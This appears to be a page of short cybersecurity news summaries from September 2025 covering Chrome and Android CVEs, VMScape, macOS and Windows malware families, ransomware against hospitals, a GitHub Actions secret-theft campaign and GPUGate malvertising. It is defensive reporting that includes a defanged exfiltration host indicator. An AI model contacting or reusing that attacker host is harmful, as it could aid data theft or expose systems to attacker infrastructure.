A security researcher earned $43,000 from Google for discovering a critical Chrome vulnerability related to the Serviceworker component (CVE-2025-10200). The vulnerabilities prompted a Chrome update to fix the issues, but it is unclear if they have been actively exploited in the wild. #CVE-2025-10200 #ChromeUpdate…
Tag: MACOS
Researchers from ETH Zurich have uncovered a new Spectre-BTI attack called VMScape that can leak sensitive memory and cryptographic keys from virtualized environments, exploiting weaknesses in CPU branch prediction isolation. This vulnerability affects AMD Zen CPUs and older Intel processors, highlighting the need for updated mitigations and patches in cloud infrastructure….
Samsung has fixed a critical remote code execution vulnerability (CVE-2025-21043) affecting Android devices, which was exploited in real-world attacks. Additionally, WhatsApp patched a zero-click vulnerability (CVE-2025-55177) linked with sophisticated spyware campaigns. #CVE202521043 #CVE202555177
![Cybersecurity News | Daily Recap [11 Sep 2025]](https://www.hendryadrian.com/tweet/image/DailyRecap.png "Cybersecurity News | Daily Recap [11 Sep 2025]")
Daily Recap, A Spectre-like VMScape flaw threatens guest-host isolation on AMD/Intel CPUs, while SonicWall CVE-2024-40766 exploits enable breach and firewall crashes. Other highlights include EggStreme, ChillyHell, AsyncRAT campaigns, and JLR data theft, with notable supply chain and privacy concerns across NPM, browser extensions, and keystroke tracking. #VMScape #SonicWallFlaw #EggStreme #ChillyHell #AsyncRAT #JLRAttack #NPMAttack #KeystrokeTracking
Healthcare organizations faced a sustained surge of ransomware attacks in 2025 that disrupted operations, forced patient-care delays, and exposed millions of records. Prominent families like INC, INTERLOCK, Akira, Qilin, RansomHub, and Warlock targeted hospitals worldwide, using phishing, exploited CVEs, Cobalt Strike, Mimikatz, and Rclone to persist, steal, and extort data. #INC #INTERLOCK
ChillyHell is a sophisticated macOS backdoor malware that has remained undetected for years despite being signed and notarized by Apple. Its modular design and multiple persistence methods make it a flexible and potentially dangerous threat for targeted systems. #ChillyHell #UNC4487…
DeepProbe is an open-source framework that automates memory forensics analysis across multiple operating systems, providing analysts with actionable forensic artifacts. It enhances detection accuracy by correlating anomalies, applying baselines, and mapping findings to the MITRE ATT&CK framework. #DeepProbe #MemoryForensics
Cybersecurity researchers have identified two new malware families: CHILLYHELL, an Apple macOS backdoor, and ZynorRAT, a Go-based remote access Trojan targeting Windows and Linux. These threats demonstrate advanced persistence tactics and the use of social engineering via websites and Telegram bots. #CHILLYHELL #ZynorRAT…
Modern Threat Intelligence feeds contain numerous indicators, but their relevance varies greatly depending on the sector and environment. The MATCH-4 Intelligence Ratio Model helps focus on high-confidence indicators by considering language, location, systems, and sector relevance, improving threat detection efficiency. #ThreatFeeds #Match4Model
On September 2, 2025, an attacker compromised multiple GitHub accounts to inject malicious GitHub Actions workflows that exfiltrated CI/CD secrets (e.g., PyPI, NPM, DockerHub, GitHub tokens) to hxxps://bold-dhawan.45-139-104-115.plesk.page leading to 3,325 leaked secrets across hundreds of repositories. Rapid disclosure and remediation by GitGuardian, affected maintainers, and registries (PyPI read-only action, reports to GitHub/NPM/PyPI) limited impact with no evidence of malicious PyPI releases; affected keywords include #FastUUID #bold-dhawan
KuCoin’s security team uncovers a sophisticated Lazarus Group phishing campaign targeting financial and crypto organizations through fake interviews, poisoned code, and exploiting recent vulnerabilities. The campaign demonstrates Lazarus’s evolving tactics, including social engineering, supply chain attacks, and malware deployment. #LazarusGroup #APT38 #CryptoTargeting…
Researchers have uncovered a malicious campaign targeting EU IT workers, delivering fake GitHub Desktop installers via sophisticated malvertising tactics. The campaign leverages GPU-based decryption and evasion techniques to evade detection and enables potential credential theft and lateral movement. #GPUGate #AtomicStealer…
Two paragraphs explain that removing metadata from files, including images and documents, helps protect privacy when sharing. The article lists methods and tools for cleaning metadata across devices and platforms, while noting limitations and security considerations.
#metadata #Exif #ExifTool #MetadataCleaner #Tails
Validin re-tested pivoting and threat-hunting techniques from four recent blog posts (Laundry Bear, phishing/HTTP features, Transparent Tribe, and BlueNoroff) to see which methods still produce novel indicators and active infrastructure. Host response, header/body/hash, DNS/IP, and registration pivots remained fruitful in many cases, producing new domains, IPs, and certificate-based links, while some specific pivots (favicons, title tags, wildcard subdomains) aged out faster. #LaundryBear #TransparentTribe #BlueNoroff
On 19 August 2025 Arctic Wolf Labs disclosed a campaign where attackers used Google Ads and GitHub commit-specific pages to redirect victims to a trojanized GitHub Desktop installer that deploys a GPU-gated decryption loader dubbed βGPUGate.β The campaign delivers a 128 MB MSI with embedded modules and a GPU/OpenCL key-generation routine that prevents execution in many sandboxes and targets Western European IT workers. #GPUGate #AMOS_Stealer